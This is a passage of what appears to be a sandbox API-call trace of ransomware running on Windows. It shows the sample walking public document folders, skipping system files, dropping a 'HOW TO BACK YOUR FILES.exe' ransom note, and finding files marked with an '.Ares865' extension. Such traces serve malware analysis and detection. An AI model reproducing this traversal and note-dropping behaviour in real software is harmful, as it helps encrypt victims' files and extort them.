(lpString1="My Pictures", lpString2="perflogs") returned -1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="MSBuild") returned 1 [0056.567] lstrlenW (lpString="My Pictures") returned 11 [0056.567] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music") returned 34 [0056.567] lstrcpyW (in: lpString1=0x2cce434, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0056.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0056.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4c) returned 0x2ed8a0 [0056.567] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7bf0 [0056.567] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0056.567] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.567] lstrcmpiW (lpString1="My Videos", lpString2="aoldtz.exe") returned 1 [0056.567] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0056.567] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="temp") returned -1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="perflogs") returned -1 [0056.568] lstrcmpiW (lpString1="My Videos", lpString2="MSBuild") returned 1 [0056.568] lstrlenW (lpString="My Videos") returned 9 [0056.568] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures") returned 37 [0056.568] lstrcpyW (in: lpString1=0x2cce434, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0056.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0056.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x48) returned 0x2ee9c0 [0056.568] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7bd0 [0056.568] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0056.568] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0056.568] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0056.568] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0056.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee9c0 | out: hHeap=0x2b0000) returned 1 [0056.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0056.568] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos") returned 35 [0056.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0056.568] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.568] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.569] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.569] GetLastError () returned 0x20 [0056.569] Sleep (dwMilliseconds=0xc8) [0056.769] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.769] GetLastError () returned 0x20 [0056.769] Sleep (dwMilliseconds=0xc8) [0056.971] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.972] GetLastError () returned 0x20 [0056.972] Sleep (dwMilliseconds=0xc8) [0057.168] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.168] GetLastError () returned 0x20 [0057.168] Sleep (dwMilliseconds=0xc8) [0057.379] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.380] GetLastError () returned 0x0 [0057.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.380] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.380] CloseHandle (hObject=0x118) returned 1 [0057.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.380] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.380] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.380] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.380] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.380] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.380] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.380] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.380] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.380] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.380] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.381] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0057.381] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0057.381] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.381] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\*") returned 37 [0057.381] lstrcpyW (in: lpString1=0x2cce448, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0057.381] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.381] lstrlenW (lpString="Ares865") returned 7 [0057.381] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.381] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x494f7340, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.381] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.381] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="aoldtz.exe") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2=".") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="..") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="windows") returned -1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="bootmgr") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="temp") returned -1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="pagefile.sys") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="boot") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="ids.txt") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="ntuser.dat") returned 1 [0057.381] lstrcmpiW (lpString1="Sample Videos", lpString2="perflogs") returned 1 [0057.382] lstrcmpiW (lpString1="Sample Videos", lpString2="MSBuild") returned 1 [0057.382] lstrlenW (lpString="Sample Videos") returned 13 [0057.382] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\desktop.ini.Ares865") returned 55 [0057.382] lstrcpyW (in: lpString1=0x2cce448, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0057.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0057.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2cc5b0 [0057.382] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bd0 [0057.382] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0057.382] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.382] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0057.382] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos" [0057.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0057.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0057.382] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos") returned 49 [0057.382] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos" [0057.382] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.382] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.383] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.383] GetLastError () returned 0x0 [0057.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.383] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.383] CloseHandle (hObject=0x118) returned 1 [0057.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.383] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.383] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.383] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.383] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.383] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.383] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.383] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.383] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.383] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49993de0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0057.383] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.383] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0057.383] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0057.383] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0057.383] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0057.383] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0057.384] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0057.384] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.384] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\*") returned 51 [0057.384] lstrcpyW (in: lpString1=0x2cce464, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0057.384] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.384] lstrlenW (lpString="Ares865") returned 7 [0057.384] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.384] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49569760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.384] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.384] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49c1b540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1907e90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv.Ares865", cAlternateFileName="")) returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="aoldtz.exe") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2=".") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="..") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="windows") returned -1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="bootmgr") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="temp") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="pagefile.sys") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="boot") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="ids.txt") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="ntuser.dat") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="perflogs") returned 1 [0057.384] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="MSBuild") returned 1 [0057.384] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0057.384] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\desktop.ini.Ares865") returned 69 [0057.384] lstrcpyW (in: lpString1=0x2cce464, lpString2="Wildlife.wmv.Ares865" | out: lpString1="Wildlife.wmv.Ares865") returned="Wildlife.wmv.Ares865" [0057.384] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0057.384] lstrlenW (lpString="Ares865") returned 7 [0057.384] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.385] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49c1b540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1907e90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv.Ares865", cAlternateFileName="")) returned 0 [0057.385] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.385] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0057.385] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0057.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0057.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0057.385] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures") returned 37 [0057.385] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0057.385] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.385] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.385] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.385] GetLastError () returned 0x0 [0057.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.385] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, 